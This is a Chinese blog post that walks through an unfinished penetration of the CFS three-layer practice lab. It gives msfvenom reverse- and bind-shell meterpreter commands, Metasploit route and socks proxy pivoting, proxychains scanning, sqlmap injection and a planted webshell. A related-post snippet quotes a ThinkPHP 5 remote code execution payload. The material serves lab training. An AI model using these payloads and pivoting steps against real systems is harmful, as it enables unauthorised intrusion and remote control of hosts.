CFS三层靶机内网渗透

已于 2023-05-13 00:35:56 修改
阅读量239 收藏
点赞数
分类专栏: 靶场复现 文章标签: 安全
于 2023-05-11 22:55:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Barlow_121212/article/details/130628989
版权

📦环境搭建:

 📘Target1_CentOS7_64

📘Target2_Ubuntu_64位:

📘 Target3_Windows7_64位

📦渗透测试:

1.nmap扫描靶机IP端口:

2.访问80端口

3。有版本尝试使用getshell工具

 

4.使用蚁剑连接并使用MSF生成反弹shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.177.227 LPORT=3333 SessionCommunicationTimeout=0 SessionExpiration=0 -f elf >muma.elf

 5.MSF监听+蚁剑上传运行

 

6.查看当前机器网段信息,添加22网段路由

run get_local_subnets


 

run autoroute -s 192.168.22.0/24
添加22网段路由

run autoroute -p
查看路由信息

 

7.使用socks代理

search socks
查找socks

use auxiliary/server/socks_proxy
进入

show options
查看信息

set VERSION 4a
将版本切换到4a

set SRVHOST 192.168.xxx.xxx
将ip设置为当前ip

 

修改socks配置

gedit /etc/proxychains4.conf

8.使用nmap扫描第二台靶机的端口信息

proxychains nmap -Pn -sT 192.168.22.129

Pn
穿透防火墙进行扫描

sT
TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。

 

9.本机使用sockscap搭建,访问第二台主机

 

10 信息收集

 

11进行sqlmap跑注入点,获得账号密码并登录后台

 

账号:admin
密码:123qwe

 

12.查看模板信息,输入phpinfo()查看是否具有回显并写入一句话木马

13使用蚁剑连接,并上传MSF连接马

 

 
 

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=12345 -f elf >shell3.elf

 

 14使用MSF监听连接,并查看网段信息,创建33网段路由。

proxychains4 msfconsole
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.129
set lport 12345
exploit

 

 做到这里socks代理崩掉了(>....<)

后续是发现有445端口,存在永恒之蓝漏洞。

海滩丨长颈鹿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cfs PPT讲解
07-20
cfs PPT对于加密文件系统做了系统的介绍和理解,挺不错
CFS调度器(6)-总结.pdf
07-31
经过前面一系列的文章描述,我们已经对CFS调度器有了一定的认识。那么本篇文章就作为一篇总结和思考。我们就回忆一下CFS调度器的那些事。我们就以问题的形式重新回顾一遍CFS调度器设计的原理。现在开始,我们问题...
渗透测试之CFS三层靶机渗透
LvHLong的博客
02-23 6317
一、环境搭建: 靶机拓扑: 1.添加虚拟卡: 添加 22段(VMnet2) 和 33(VMnet3)段的卡 VMnet8为NAT模式与外部通信 2.配置卡: target1络配置: target2络配置: target3络配置: 3.web靶机搭建(宝塔面板启动) 启动命令: /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 环境搭建完 kali能ping通ta..
【VulnHub靶场】——CFS三层靶机渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
渗透测试——CFS三层靶机渗透
抚琴
01-29 2153
是样一个逻辑 nmap信息收集: nmap -T4 -O 192.168.1.107 http://192.168.1.107/public/ 看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞 payload: http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&var.
CFS三层靶机实验
qq_59201520的博客
03-07 513
关于CFS三层靶机实验步骤的解读和复现
[内渗透]CFS三层靶机渗透
leekos的博客,分享web安全相关知识~
08-12 860
在MSF中开启监听,与Target2建立连接,这里需要注意,上一次代理使用的reverse_tcp是MSF作为监听,让Target1连到我们,而这次代理使用的bind_tcp是Target2作为监听,我们需要连到Target2,这个逻辑正好是相反的。我们可以设置一个路由,然后把我们的请求通过Target1的vmnet1段发出,然后重定向转发到vmnet2段,这样kali的msf就可以与22段(Target2)互通了。(新开一个终端后,我们需要在这个新开的msf终端上配置一个代理,然后修改。
CFS.zip_CFS-GA_cfs
09-21
30位CFS加密源码,简单的实现了CFS加密,有注释
sched_fair.rar_batch_cfs
09-22
Completely Fair Scheduling CFS Class SCHED_NORMAL/SCHED_BATCH
linux CFS调度以及load balance.pptx
02-24
cfs, load
【VulHub靶场】之CFS三层靶机渗透
weixin_51519028的博客
10-21 1572
msf配置代理的实操
CFS三层宝塔内渗透
m0_65096687的博客
04-09 656
1.靶场搭建自行百度一共有三个目标targetkali攻击机与targe1段是一致。因为是内渗透。进入正题直接访问目标主机,发现是thinkphp5。直接百度thinkphp5的exp发现利用漏洞上传一句话木马 上传后使用蚁剑进行连接拿到权限后输入 uname-a 来查看当前主机的操作系统然后在kali中msf线上找马生成一个linux x64 的木马然后使用蚁剑传入target1中获取shell(我是一个初学者,我我的理解是使用普通的蚁剑获取shell后再使用隧道代理会有些麻烦,我也不会。所以
CFS三层内靶机渗透
Ays.Ie的博客
05-18 1273
CFS三层靶机渗透全过程
CFS三层靶机渗透_Kali版
qq_42383069的博客
03-18 5700
环境搭建 0x01. 环境下载: 【CFS三层靶机环境】百度盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com 0x02. 环境搭建: 1)设置虚拟机卡(新建两个仅主机模式的卡) VMnet10: 子IP:192.168.22.0 子掩码:255.255.255.0 VMnet11: 子IP:192.168.33.0 子掩码:255.255.255.0 2)虚
CFS三层靶机安装与配置
ChenD的学习笔记
03-07 729
CFS三层靶机安装与配置,三层靶机,内渗透靶机,非常详细,这时候就要给它改成静态的。Ubuntu中带了一个账号dora,如果进入图形化页面,则需要dora的密码,所以先一步修改dora的密码。target2为三层靶机中的第二层,需要与第一层(target1)互通,与第三层(target3)互通。target1为三层靶机中的第一层,需要与第二层(target2)互通,与攻击机(Kali互通)HWADDR=00:0c:29:63:e9:a0 #修改它。
CFS三层靶机搭建及其内渗透
..
07-05 5929
CFS三层靶机搭建及其内渗透,附靶场环境
CFS三层内靶场渗透
Cfoxer的博客
10-25 2486
使用搭载了VMnet1卡的kali模拟攻击者从外信息收集,得到站信息,利用站漏洞夺取外服务器权限,又将失陷的外服务器作为跳板机,通过代理的方式访问到了内服务器,然后通过内服务器站的漏洞,再一次夺取权限并建立二次代理以后,到达内办公环境,最后利用主机所存在的漏洞,获得内主机权限的渗透流程。发现22段存在设备2,ip地址为192.168.22.129,并且设备2,开启80端口,配置浏览器代理插件,使用浏览器访问查看。访问成功,设置socks5代理,然后使用蚁剑连接。
渗透CFS三层靶机搭建
不知名白帽的博客
09-16 9769
渗透CFS三层靶机搭建
CFS三层内环境 渗透流程
baynk的博客
07-07 1513
0x00 环境搭建 本身作者环境已经部署完成,只需要更改IP地址及服务策略即可正常使用。原文地址公众号teamssix,回复cfs即可。 我这里将操作时将环境做了一定调整,将Target 1的Vmnet1卡改成了VMnet8,其余的保持不变,另外还需要在Target 1的宝塔面板中加入对应的IP地址 另外如果靶机开机时没有IP地址,也需要自己手动将IP地址配置完成,确保攻击环境和Targert 1能通信,Target 2可以和Target 1与Target 3可以相互通信。 0x01 Target
cfs渗透centos7靶机下载
最新发布
12-05
为了在CentOS 7靶机上进行内渗透,我们可以通过开放80端口并访问站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值